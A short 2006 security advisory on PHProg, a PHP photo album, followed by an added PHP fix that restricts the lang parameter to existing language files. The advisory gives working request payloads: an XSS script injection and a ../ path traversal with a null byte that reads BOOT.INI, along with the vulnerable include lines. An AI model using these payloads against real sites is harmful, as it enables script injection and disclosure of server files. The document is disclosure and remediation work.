(11/09/06)
* Vulnerable product: PHProg (photo album in PHP)
* Official product site: http://www.PHProg.com/
* Security flaws found:
1] Full path disclosure: http://localhost/PHProg/?id=1&album=cdg393
2] Cross Site Scripting (XSS): http://localhost/PHProg/?id=1&album=<script>alert('cdg393')</script>
3] Local File Inclusion:
http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00
Line 59 => $lang=$_GET['lang'];
Line 61 => include("lang/$lang.php");
* Credits: cdg393 : cdg.new.fr =)
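Added example, not part of the original advisory or of PHProg's code: one way to fix the local file inclusion at lines 59 and 61, by letting the lang parameter only select among files that actually exist in lang/. The function name resolve_lang_file, the default language "fr" and the sample files are assumptions.

```php
<?php
// Added example, not PHProg's code: hardened form of lines 59 and 61.
// Assumptions: language files live in lang/<code>.php; "fr" is the default.
const DEFAULT_LANG = 'fr';

// Map the untrusted ?lang= value to an existing file in $langDir.
// The value only selects from files found on disk; it is never
// concatenated into the path given to include().
function resolve_lang_file($requested, string $langDir): string
{
    $allowed = []; // code => absolute path
    foreach (glob($langDir . '/*.php') ?: [] as $path) {
        $allowed[basename($path, '.php')] = realpath($path);
    }
    // Reject arrays (?lang[]=x), "../", slashes, dots and NUL bytes (%00).
    $valid = is_string($requested)
        && preg_match('/\A[A-Za-z0-9_-]{1,16}\z/', $requested) === 1
        && isset($allowed[$requested]);
    if (!$valid) {
        $requested = DEFAULT_LANG;
    }
    if (!isset($allowed[$requested])) {
        throw new RuntimeException('default language file is missing');
    }
    return $allowed[$requested];
}

// Self-check on constructed inputs, using a temporary lang directory.
$dir = sys_get_temp_dir() . '/phprog_lang_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/fr.php", '<?php $txt = "Bonjour";');
file_put_contents("$dir/en.php", '<?php $txt = "Hello";');

$samples = ['en', "../../../../../../BOOT.INI\0", 'en/../fr', ['x'], ''];
foreach ($samples as $value) {
    $file = resolve_lang_file($value, $dir);
    printf("%-36s -> %s\n", json_encode($value, JSON_UNESCAPED_SLASHES), basename($file));
}
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);

// In index.php, lines 59 and 61 would then become (assumed layout):
//   include resolve_lang_file($_GET['lang'] ?? DEFAULT_LANG, __DIR__ . '/lang');
```

The %00 in the advisory's URL cuts off the appended .php; PHP 5.3.4 and later reject paths containing NUL bytes, but ../ traversal to other .php files remains possible without a check like this one.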